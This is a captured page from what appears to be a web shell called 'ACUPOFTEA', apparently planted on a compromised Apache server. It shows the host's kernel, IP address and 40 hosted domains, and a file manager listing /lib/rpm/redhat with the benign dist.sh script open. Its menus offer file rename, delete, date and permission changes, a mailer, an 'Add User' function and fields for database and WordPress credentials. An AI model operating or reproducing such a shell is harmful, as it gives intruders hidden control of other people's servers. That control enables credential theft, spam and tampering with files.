System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib
/
rpm
/
redhat
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
dist.sh
#!/bin/bash # dist.sh # Author: Tom "spot" Callaway <tcallawa@redhat.com> # License: GPL # This is a script to output the value for the %{dist} # tag. The dist tag takes the following format: .$type$num # Where $type is one of: el, fc, rh # (for RHEL, Fedora Core, and RHL, respectively) # And $num is the version number of the distribution. # NOTE: We can't detect Rawhide or Fedora Test builds properly. # If we successfully detect the version number, we output the # dist tag. Otherwise, we exit with no output. RELEASEFILE=/etc/redhat-release function check_num { MAINVER=`cut -d "(" -f 1 < $RELEASEFILE | \ sed -e "s/[^0-9.]//g" -e "s/$//g" | cut -d "." -f 1` echo $MAINVER | grep -q '[0-9]' && echo $MAINVER } function check_rhl { grep -q "Red Hat Linux" $RELEASEFILE && ! grep -q "Advanced" $RELEASEFILE && echo $DISTNUM } function check_rhel { egrep -q "(Enterprise|Advanced|AlmaLinux)" $RELEASEFILE && echo $DISTNUM } function check_fedora { grep -q Fedora $RELEASEFILE && echo $DISTNUM } DISTNUM=`check_num` DISTFC=`check_fedora` DISTRHL=`check_rhl` DISTRHEL=`check_rhel` if [ -n "$DISTNUM" ]; then if [ -n "$DISTFC" ]; then DISTTYPE=fc elif [ -n "$DISTRHEL" ]; then DISTTYPE=el elif [ -n "$DISTRHL" ]; then DISTTYPE=rhl fi fi [ -n "$DISTTYPE" -a -n "$DISTNUM" ] && DISTTAG=".${DISTTYPE}${DISTNUM}" case "$1" in --el) echo -n "$DISTRHEL" ;; --fc) echo -n "$DISTFC" ;; --rhl) echo -n "$DISTRHL" ;; --distnum) echo -n "$DISTNUM" ;; --disttype) echo -n "$DISTTYPE" ;; --help) printf "Usage: $0 [OPTIONS]\n" printf " Default mode is --dist. Possible options:\n" printf " --el\t\tfor RHEL version (if RHEL)\n" printf " --fc\t\tfor Fedora version (if Fedora)\n" printf " --rhl\t\tfor RHL version (if RHL)\n" printf " --dist\t\tfor distribution tag\n" printf " --distnum\tfor distribution number (major)\n" printf " --disttype\tfor distribution type\n" ;; *) echo -n "$DISTTAG" ;; esac
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-28 10:59:25
..
DIR
-
drwxr-xr-x
2024-12-18 10:57:28
brp-ldconfig
text/x-shellscript
268 B
-rwxr-xr-x
2023-04-06 08:55:45
brp-mangle-shebangs
text/x-shellscript
4.39 KB
-rwxr-xr-x
2023-04-06 08:55:45
config.guess
text/x-shellscript
42.91 KB
-rwxr-xr-x
2023-04-06 08:55:45
config.sub
text/x-shellscript
35.46 KB
-rwxr-xr-x
2023-04-06 08:55:45
dist.sh
text/x-shellscript
1.93 KB
-rwxr-xr-x
2023-04-06 08:55:45
find-provides
text/x-shellscript
1.19 KB
-rwxr-xr-x
2023-04-06 08:55:45
find-requires
text/x-shellscript
936 B
-rwxr-xr-x
2023-04-06 08:55:45
gpgverify
text/x-shellscript
3.54 KB
-rwxr-xr-x
2023-04-06 08:55:45
macros
text/plain
10.6 KB
-rw-r--r--
2023-04-06 08:55:45
redhat-annobin-cc1
text/plain
93 B
-r--r--r--
2023-04-06 08:55:45
redhat-annobin-plugin-select.sh
text/plain
6.05 KB
-rwxr-xr-x
2023-04-06 08:55:45
redhat-annobin-select-annobin-built-plugin
text/plain
89 B
-r--r--r--
2023-04-06 08:55:45
redhat-annobin-select-gcc-built-plugin
text/plain
93 B
-r--r--r--
2023-04-06 08:55:45
redhat-hardened-cc1
text/plain
76 B
-r--r--r--
2023-04-06 08:55:45
redhat-hardened-ld
text/plain
47 B
-r--r--r--
2023-04-06 08:55:45
rpmrc
text/plain
5.31 KB
-rw-r--r--
2023-04-06 08:55:45
~ ACUPOFTEA - mail.ontime-ae.com